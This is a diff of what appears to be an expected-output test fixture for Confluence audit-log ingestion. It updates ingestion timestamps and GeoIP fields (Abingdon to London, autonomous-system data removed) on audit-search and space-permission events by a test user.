@@ -75,7 +69,7 @@ }, "event": { "action": "atlassian.audit.event.action.audit.search", - "ingested": "2021-12-08T15:08:08.222369782Z", + "ingested": "2021-12-14T14:34:31.513197127Z", "original": "{\"timestamp\":\"2021-11-23T00:44:36.398Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"atlassian.audit.event.category.audit\",\"category\":\"Auditing\",\"actionI18nKey\":\"atlassian.audit.event.action.audit.search\",\"action\":\"Audit Log search performed\"},\"affectedObjects\":[],\"changedValues\":[],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[{\"nameI18nKey\":\"atlassian.audit.event.attribute.id\",\"name\":\"ID Range\",\"value\":\"79 - 178\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.query\",\"name\":\"Query\",\"value\":\"\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.results\",\"name\":\"Results returned\",\"value\":\"100\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.timestamp\",\"name\":\"Timestamp Range\",\"value\":\"2021-11-23T00:39:37.166Z - 2021-11-23T00:43:12.188Z\"}]}", "type": "info", "kind": "event" @@ -143,20 +137,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", 
@@ -164,7 +152,7 @@ }, "event": { "action": "atlassian.audit.event.action.audit.search", - "ingested": "2021-12-08T15:08:08.222374383Z", + "ingested": "2021-12-14T14:34:31.513199468Z", "original": "{\"timestamp\":\"2021-11-23T00:43:12.188Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"atlassian.audit.event.category.audit\",\"category\":\"Auditing\",\"actionI18nKey\":\"atlassian.audit.event.action.audit.search\",\"action\":\"Audit Log search performed\"},\"affectedObjects\":[],\"changedValues\":[],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[{\"nameI18nKey\":\"atlassian.audit.event.attribute.id\",\"name\":\"ID Range\",\"value\":\"1 - 76\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.query\",\"name\":\"Query\",\"value\":\"\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.results\",\"name\":\"Results returned\",\"value\":\"76\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.timestamp\",\"name\":\"Timestamp Range\",\"value\":\"2021-11-23T00:34:44.466Z - 2021-11-23T00:39:37.149Z\"}]}", "type": "info", "kind": "event" @@ -232,20 +220,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", 
@@ -253,7 +235,7 @@ }, "event": { "action": "atlassian.audit.event.action.audit.search", - "ingested": "2021-12-08T15:08:08.222376453Z", + "ingested": "2021-12-14T14:34:31.513199958Z", "original": "{\"timestamp\":\"2021-11-23T00:41:45.280Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"atlassian.audit.event.category.audit\",\"category\":\"Auditing\",\"actionI18nKey\":\"atlassian.audit.event.action.audit.search\",\"action\":\"Audit Log search performed\"},\"affectedObjects\":[],\"changedValues\":[],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[{\"nameI18nKey\":\"atlassian.audit.event.attribute.id\",\"name\":\"ID Range\",\"value\":\"77 - 176\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.query\",\"name\":\"Query\",\"value\":\"\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.results\",\"name\":\"Results returned\",\"value\":\"100\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.timestamp\",\"name\":\"Timestamp Range\",\"value\":\"2021-11-23T00:39:37.155Z - 2021-11-23T00:41:17.165Z\"}]}", "type": "info", "kind": "event" @@ -321,20 +303,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", 
@@ -342,7 +318,7 @@ }, "event": { "action": "atlassian.audit.event.action.audit.search", - "ingested": "2021-12-08T15:08:08.222378415Z", + "ingested": "2021-12-14T14:34:31.513200432Z", "original": "{\"timestamp\":\"2021-11-23T00:41:17.165Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"atlassian.audit.event.category.audit\",\"category\":\"Auditing\",\"actionI18nKey\":\"atlassian.audit.event.action.audit.search\",\"action\":\"Audit Log search performed\"},\"affectedObjects\":[],\"changedValues\":[],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[{\"nameI18nKey\":\"atlassian.audit.event.attribute.id\",\"name\":\"ID Range\",\"value\":\"1 - 74\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.query\",\"name\":\"Query\",\"value\":\"\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.results\",\"name\":\"Results returned\",\"value\":\"74\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.timestamp\",\"name\":\"Timestamp Range\",\"value\":\"2021-11-23T00:34:44.466Z - 2021-11-23T00:39:37.137Z\"}]}", "type": "info", "kind": "event" @@ -410,20 +386,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", 
@@ -431,7 +401,7 @@ }, "event": { "action": "atlassian.audit.event.action.audit.search", - "ingested": "2021-12-08T15:08:08.222380286Z", + "ingested": "2021-12-14T14:34:31.513200825Z", "original": "{\"timestamp\":\"2021-11-23T00:41:16.741Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"atlassian.audit.event.category.audit\",\"category\":\"Auditing\",\"actionI18nKey\":\"atlassian.audit.event.action.audit.search\",\"action\":\"Audit Log search performed\"},\"affectedObjects\":[],\"changedValues\":[],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[{\"nameI18nKey\":\"atlassian.audit.event.attribute.id\",\"name\":\"ID Range\",\"value\":\"75 - 174\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.query\",\"name\":\"Query\",\"value\":\"\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.results\",\"name\":\"Results returned\",\"value\":\"100\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.timestamp\",\"name\":\"Timestamp Range\",\"value\":\"2021-11-23T00:39:37.143Z - 2021-11-23T00:41:07.156Z\"}]}", "type": "info", "kind": "event" @@ -499,20 +469,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", 
@@ -520,7 +484,7 @@ }, "event": { "action": "atlassian.audit.event.action.audit.search", - "ingested": "2021-12-08T15:08:08.222382179Z", + "ingested": "2021-12-14T14:34:31.513201217Z", "original": "{\"timestamp\":\"2021-11-23T00:41:07.156Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"atlassian.audit.event.category.audit\",\"category\":\"Auditing\",\"actionI18nKey\":\"atlassian.audit.event.action.audit.search\",\"action\":\"Audit Log search performed\"},\"affectedObjects\":[],\"changedValues\":[],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[{\"nameI18nKey\":\"atlassian.audit.event.attribute.id\",\"name\":\"ID Range\",\"value\":\"1 - 72\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.query\",\"name\":\"Query\",\"value\":\"\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.results\",\"name\":\"Results returned\",\"value\":\"72\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.timestamp\",\"name\":\"Timestamp Range\",\"value\":\"2021-11-23T00:34:44.466Z - 2021-11-23T00:39:37.128Z\"}]}", "type": "info", "kind": "event" @@ -588,20 +552,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", 
@@ -609,7 +567,7 @@ }, "event": { "action": "atlassian.audit.event.action.audit.search", - "ingested": "2021-12-08T15:08:08.222384080Z", + "ingested": "2021-12-14T14:34:31.513201684Z", "original": "{\"timestamp\":\"2021-11-23T00:41:06.871Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"atlassian.audit.event.category.audit\",\"category\":\"Auditing\",\"actionI18nKey\":\"atlassian.audit.event.action.audit.search\",\"action\":\"Audit Log search performed\"},\"affectedObjects\":[],\"changedValues\":[],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[{\"nameI18nKey\":\"atlassian.audit.event.attribute.id\",\"name\":\"ID Range\",\"value\":\"73 - 172\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.query\",\"name\":\"Query\",\"value\":\"\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.results\",\"name\":\"Results returned\",\"value\":\"100\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.timestamp\",\"name\":\"Timestamp Range\",\"value\":\"2021-11-23T00:39:37.132Z - 2021-11-23T00:40:32.595Z\"}]}", "type": "info", "kind": "event" @@ -677,20 +635,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", 
@@ -698,7 +650,7 @@ }, "event": { "action": "atlassian.audit.event.action.audit.search", - "ingested": "2021-12-08T15:08:08.222385975Z", + "ingested": "2021-12-14T14:34:31.513202080Z", "original": "{\"timestamp\":\"2021-11-23T00:40:32.595Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"atlassian.audit.event.category.audit\",\"category\":\"Auditing\",\"actionI18nKey\":\"atlassian.audit.event.action.audit.search\",\"action\":\"Audit Log search performed\"},\"affectedObjects\":[],\"changedValues\":[],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[{\"nameI18nKey\":\"atlassian.audit.event.attribute.id\",\"name\":\"ID Range\",\"value\":\"1 - 70\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.query\",\"name\":\"Query\",\"value\":\"\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.results\",\"name\":\"Results returned\",\"value\":\"70\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.timestamp\",\"name\":\"Timestamp Range\",\"value\":\"2021-11-23T00:34:44.466Z - 2021-11-23T00:39:37.115Z\"}]}", "type": "info", "kind": "event" @@ -766,20 +718,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", 
@@ -787,7 +733,7 @@ }, "event": { "action": "atlassian.audit.event.action.audit.search", - "ingested": "2021-12-08T15:08:08.222387907Z", + "ingested": "2021-12-14T14:34:31.513202484Z", "original": "{\"timestamp\":\"2021-11-23T00:40:32.138Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"atlassian.audit.event.category.audit\",\"category\":\"Auditing\",\"actionI18nKey\":\"atlassian.audit.event.action.audit.search\",\"action\":\"Audit Log search performed\"},\"affectedObjects\":[],\"changedValues\":[],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[{\"nameI18nKey\":\"atlassian.audit.event.attribute.id\",\"name\":\"ID Range\",\"value\":\"71 - 170\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.query\",\"name\":\"Query\",\"value\":\"\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.results\",\"name\":\"Results returned\",\"value\":\"100\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.timestamp\",\"name\":\"Timestamp Range\",\"value\":\"2021-11-23T00:39:37.122Z - 2021-11-23T00:39:37.908Z\"}]}", "type": "info", "kind": "event" @@ -865,20 +811,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", 
@@ -886,7 +826,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:08:08.222389795Z", + "ingested": "2021-12-14T14:34:31.513202955Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.908Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-users\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-users\",\"id\":\"confluence-users\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-users\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"SETPAGEPERMISSIONS\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -971,20 +911,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", 
@@ -992,7 +926,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:08:08.222391673Z", + "ingested": "2021-12-14T14:34:31.513203356Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.904Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"test user\",\"type\":\"User\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"id\":\"2c9680837d4a3682017d4a375a280000\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"SETPAGEPERMISSIONS\"},{\"key\":\"User\",\"i18nKey\":\"User\",\"to\":\"admin\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -1077,20 +1011,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", 
@@ -1098,7 +1026,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:08:08.222393710Z", + "ingested": "2021-12-14T14:34:31.513203935Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.899Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-administrators\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-administrators\",\"id\":\"confluence-administrators\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-administrators\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"SETPAGEPERMISSIONS\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -1176,20 +1104,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", 
@@ -1197,7 +1119,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:08:08.222395625Z", + "ingested": "2021-12-14T14:34:31.513204323Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.895Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"Anonymous\",\"type\":\"User\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"REMOVEMAIL\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -1282,20 +1204,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", 
@@ -1303,7 +1219,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:08:08.222397491Z", + "ingested": "2021-12-14T14:34:31.513204715Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.891Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-users\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-users\",\"id\":\"confluence-users\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-users\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"REMOVEMAIL\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -1388,20 +1304,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", 
@@ -1409,7 +1319,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:08:08.222399398Z", + "ingested": "2021-12-14T14:34:31.513205133Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.887Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"test user\",\"type\":\"User\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"id\":\"2c9680837d4a3682017d4a375a280000\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"REMOVEMAIL\"},{\"key\":\"User\",\"i18nKey\":\"User\",\"to\":\"admin\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -1494,20 +1404,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", 
@@ -1515,7 +1419,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:08:08.222401289Z", + "ingested": "2021-12-14T14:34:31.513205540Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.882Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-administrators\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-administrators\",\"id\":\"confluence-administrators\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-administrators\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"REMOVEMAIL\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -1593,20 +1497,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", 